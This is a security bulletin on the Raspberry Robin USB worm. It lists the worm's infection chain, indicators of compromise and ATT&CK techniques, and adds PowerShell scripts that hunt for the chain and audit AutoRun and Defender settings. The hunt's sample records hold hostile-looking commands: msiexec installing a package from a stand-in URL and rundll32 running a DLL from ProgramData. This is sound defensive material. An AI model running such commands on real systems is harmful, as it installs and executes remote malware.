
Raspberry Robin Worm infects Telecoms, Governments

Target Industry

Initially seen in technology and manufacturing organisations, the worm has now spread through government agencies and telecommunication entities in Latin America, Australia and Europe.

Overview

Severity level: High – Exploitation is likely to lead to further malicious activity, with human operated ransomware and other types of malware being observed.
Raspberry Robin was initially seen spreading via infected external drives but Microsoft is now aware of at least four confirmed Raspberry Robin entry vectors.

The malware uses Windows Installer to communicate with compromised QNAP-associated domains to download and install malicious DLL files to the infected device.

The USB payload behaviour follows five distinct steps:

1. Infected external device attached to the victim’s computer
2. cmd.exe reads and executes the malicious file, then launches msiexec.exe, which reaches out to a malicious URL
3. Malicious DLL installed from the previously contacted URL
4. rundll32.exe launches a legitimate Windows utility to execute the malicious DLL
5. Outbound connections attempted, usually to Tor networks

Researchers at Avast have documented a heavily obfuscated DLL backdoor used by Raspberry Robin, which they’ve named Roshtyak.

Impact

Depending on the network’s settings, an infected USB drive may autorun the malware or trick a user into manual execution.
Successful execution can result in the compromise of the system. This may lead to further attacks and the loss of sensitive data.

Vulnerability Detection

Microsoft has been closely tracking Raspberry Robin activity and current builds of Microsoft Defender can alert users to exploitation by flagging at stage 3 of the attack chain.
Logs may also be searched for unexpected msiexec.exe activity and DLL downloads/connections.
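As an added example, not taken from the bulletin or from Microsoft's guidance, the PowerShell below turns the two hunts named here into a reusable filter: msiexec.exe spawned by cmd.exe with a remote package URL (stage 2 of the chain above) and the proxy-execution binaries from the bulletin's T1218 entries running a DLL from outside C:\Windows (stage 4), plus a direct match against the hashes and IPs listed under Indicators of Compromise. The record shape (Image, ParentImage, CommandLine, Hash, DestinationIp) and the sample records are constructed to mirror Sysmon process-creation and network-connection events; the function name and the "outside C:\Windows" heuristic are this example's own.

```powershell
# Added example (not from the bulletin): hunt process-creation and network
# records for the Raspberry Robin chain described above. Records are
# constructed to mirror Sysmon Event ID 1 / ID 3 fields; in practice pipe
# Get-WinEvent output into Test-RaspberryRobinRecord instead.

# Hashes and IPs as listed under Indicators of Compromise in this bulletin.
$IocHashes = @(
    '6fb0ad3f756b5d1f871cf34c3e4ea47cb34643cd17709a09c25076c400313adf',
    '1a5fcb209b5af4c620453a70653263109716f277150f0d389810df85ec0beac1',
    '1d2c8db9ac6082f32e9178469c2c416e5e170095d7f84a771dbb91192c681598',
    'cea528052dc6137b9ec1f2b03342921894fd0bb3b21209320bfdcb4ff7d27fb8',
    '6f5ea8383bc3bd07668a7d24fe9b0828',
    'e8f0d33109448f877a0e532b1a27131a'
)
$IocIps = @('46.11.88.251', '77.28.21.107', '77.99.129.181', '84.221.210.56', '85.171.54.231')

# System binaries from the bulletin's T1218 entries that the worm uses to run its DLL.
$ProxyBinaries = @('rundll32.exe', 'odbcconf.exe', 'regsvr32.exe')

function Test-RaspberryRobinRecord {
    param([Parameter(Mandatory)] $Record)
    $hits   = @()
    $image  = [IO.Path]::GetFileName([string]$Record.Image).ToLower()
    $parent = [IO.Path]::GetFileName([string]$Record.ParentImage).ToLower()
    $cmd    = [string]$Record.CommandLine

    # Stage 2: cmd.exe launching msiexec.exe with a remote package URL.
    if ($image -eq 'msiexec.exe' -and $parent -eq 'cmd.exe' -and $cmd -match 'https?://') {
        $hits += 'msiexec.exe spawned by cmd.exe with remote package URL (stage 2)'
    }
    # Stage 4: a proxy-execution binary loading a DLL from outside C:\Windows.
    # This is a heuristic, so treat it as a triage lead rather than a verdict.
    if ($ProxyBinaries -contains $image -and $cmd -match '([a-z]:\\[^\s"]+\.dll)') {
        $dll = $Matches[1]
        if ($dll -notmatch '^c:\\windows\\') {
            $hits += "$image executing DLL outside C:\Windows: $dll (stage 4)"
        }
    }
    # Direct IoC matches on file hash (MD5 or SHA256) and destination IP.
    if ($Record.Hash -and $IocHashes -contains $Record.Hash) {
        $hits += "known Raspberry Robin hash $($Record.Hash)"
    }
    if ($Record.DestinationIp -and $IocIps -contains $Record.DestinationIp) {
        $hits += "connection to known Raspberry Robin IP $($Record.DestinationIp)"
    }
    return $hits
}

# Constructed sample records (not real telemetry); hostnames, file paths
# and the URL are placeholders.
$records = @(
    [pscustomobject]@{ Host = 'WS01'; ParentImage = 'C:\Windows\explorer.exe'
        Image = 'C:\Windows\System32\cmd.exe'; CommandLine = 'cmd.exe /c E:\setup.cmd' },
    [pscustomobject]@{ Host = 'WS01'; ParentImage = 'C:\Windows\System32\cmd.exe'
        Image = 'C:\Windows\System32\msiexec.exe'
        CommandLine = 'msiexec.exe /q /i http://placeholder.invalid/pkg.msi' },
    [pscustomobject]@{ Host = 'WS01'; ParentImage = 'C:\Windows\System32\msiexec.exe'
        Image = 'C:\Windows\System32\rundll32.exe'
        CommandLine = 'rundll32.exe C:\ProgramData\placeholder.dll,Run'
        Hash = '6f5ea8383bc3bd07668a7d24fe9b0828' },
    [pscustomobject]@{ Host = 'WS02'; Image = 'C:\Windows\System32\rundll32.exe'
        CommandLine = 'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL' },
    [pscustomobject]@{ Host = 'WS01'; Image = 'C:\Windows\System32\rundll32.exe'
        DestinationIp = '77.28.21.107' }
)

foreach ($r in $records) {
    foreach ($h in (Test-RaspberryRobinRecord -Record $r)) {
        '[{0}] {1}' -f $r.Host, $h
    }
}
```

Run as written, the benign WS02 record (rundll32.exe loading shell32.dll from System32) produces no output, while the three WS01 records that mirror the chain each produce a line; the hash and IP checks are exact matches, so they only fire on the listed indicators and do not cover new builds.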

Affected Products

Windows OS.

Containment, Mitigations & Remediations

It is strongly recommended that customers have an effective endpoint detection & response (EDR) solution in place to help protect against this type of attack.

Untrained users should not investigate unknown external media devices. Aside from the possibility of malicious files or exploit code, one well-known attack is for the USB device to present to the host operating system as a keyboard and start typing malicious commands. This can present issues for investigators.

Autorun is disabled by default in recent Windows versions but may be enabled via registry changes or group policy on legacy networks.

Microsoft reports that their attack surface reduction rules have been successful in mitigating the attack in its early stages.

Microsoft advises customers to ensure Defender anti-virus scans include removable disks. They’ve also published advice on defending against ransomware.
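The following PowerShell, added here as an example rather than taken from the bulletin or from Microsoft, audits the host settings this section discusses: the AutoRun policy values under Policies\Explorer that group policy writes (NoDriveTypeAutoRun, a drive-type bitmask in which 0x04 is the removable-drive bit, and NoAutorun) and the Defender preference that controls whether scans include removable drives, with a look at which attack surface reduction rules are configured. The function names are this example's own; the registry path, the bitmask meaning and the Get-MpPreference/Set-MpPreference parameters are standard Windows ones.

```powershell
# Added example (not from the bulletin or Microsoft): read-only audit of the
# host settings discussed in this section, with one remediation function.
# Run from an elevated PowerShell session on the endpoint.

function Get-AutoRunPolicy {
    # The "Turn off AutoPlay" group policy writes NoDriveTypeAutoRun under
    # Policies\Explorer; it is a bitmask of drive types, 0x04 being removable
    # drives and 0xFF all drives. NoAutorun = 1 stops autorun.inf commands.
    foreach ($hive in 'HKLM', 'HKCU') {
        $key   = "${hive}:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        $mask  = $props.NoDriveTypeAutoRun
        $maskText = if ($null -eq $mask) { 'not set (OS default)' } else { '0x{0:X2}' -f [int]$mask }
        [pscustomobject]@{
            Hive                = $hive
            NoDriveTypeAutoRun  = $maskText
            RemovableAutoRunOff = ($null -ne $mask) -and (([int]$mask -band 0x04) -ne 0)
            NoAutorun           = ([int]$props.NoAutorun) -eq 1
        }
    }
}

function Get-DefenderRemovableScanState {
    # Get-MpPreference exposes DisableRemovableDriveScanning; when $true, full
    # scans skip USB drives, which the bulletin advises against. ASR rule
    # actions are 0 = disabled, 1 = block, 2 = audit, 6 = warn.
    $pref = Get-MpPreference
    [pscustomobject]@{
        RemovableDriveScanning = -not $pref.DisableRemovableDriveScanning
        AsrRulesConfigured     = @($pref.AttackSurfaceReductionRules_Ids | Where-Object { $_ }).Count
        AsrRuleActions         = ($pref.AttackSurfaceReductionRules_Actions -join ',')
    }
}

function Enable-DefenderRemovableDriveScanning {
    # Remediation for the Defender item above (needs elevation).
    Set-MpPreference -DisableRemovableDriveScanning $false
}

Get-AutoRunPolicy | Format-Table -AutoSize
Get-DefenderRemovableScanState | Format-List
```

A RemovableAutoRunOff value of False on a legacy network is the registry-level confirmation of the condition described above; the Defender result tells you whether the removable-disk scanning advice has been applied, and Enable-DefenderRemovableDriveScanning applies it.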

Indicators of Compromise

Raspberry Robin reported hash values:

6fb0ad3f756b5d1f871cf34c3e4ea47cb34643cd17709a09c25076c400313adf
1a5fcb209b5af4c620453a70653263109716f277150f0d389810df85ec0beac1
1d2c8db9ac6082f32e9178469c2c416e5e170095d7f84a771dbb91192c681598
cea528052dc6137b9ec1f2b03342921894fd0bb3b21209320bfdcb4ff7d27fb8
6f5ea8383bc3bd07668a7d24fe9b0828
e8f0d33109448f877a0e532b1a27131a

Raspberry Robin associated IPs:

46.11.88.251
77.28.21.107
77.99.129.181
84.221.210.56
85.171.54.231

Roshtyak indicators:

https://github.com/avast/ioc/tree/master/RaspberryRobin

Threat Landscape

Raspberry Robin has been spreading since its initial discovery at the tail end of 2021. Initially spreading relatively slowly, it is now one of the largest malware distribution platforms currently active. Microsoft reports that nearly 3,000 devices in almost 1,000 organisations have seen at least one Raspberry Robin payload-related alert in October 2022.

Threat Group

Infection by Raspberry Robin has at different times led to deployment of IcedID, Bumblebee and TrueBot payloads, indicating that its operators may be providing initial access to a number of other threat actors.

In July 2022 Microsoft reported FakeUpdates (SocGholish) malware being delivered via existing Raspberry Robin infections leading to DEV-0243 activity (EvilCorp).

In October 2022, Microsoft researchers observed Raspberry Robin infections followed by Cobalt Strike activity from DEV-0950 (FIN11/TA505) leading to deployment of Clop ransomware.

Mitre Methodologies

T1036 – Masquerading
T1091 – Replication Through Removable Media
T1059.003 – Command and Scripting Interpreter: Windows Command Shell
T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control
T1218.011 – System Binary Proxy Execution: Rundll32
T1218.008 – System Binary Proxy Execution: Odbcconf
T1218.007 – System Binary Proxy Execution: Msiexec
T1218.010 – System Binary Proxy Execution: Regsvr32
T1574.002 – Hijack Execution Flow: DLL Side-Loading
T1071.001 – Application Layer Protocol: Web Protocols
T1105 – Ingress Tool Transfer

Further Information

Raspberry Robin gets the worm early

Raspberry Robin: Highly Evasive Worm Spreads over External Disks

Raspberry Robin’s Roshtyak: A Little Lesson in Trickery

Raspberry Robin worm part of larger ecosystem facilitating pre-ransomware activity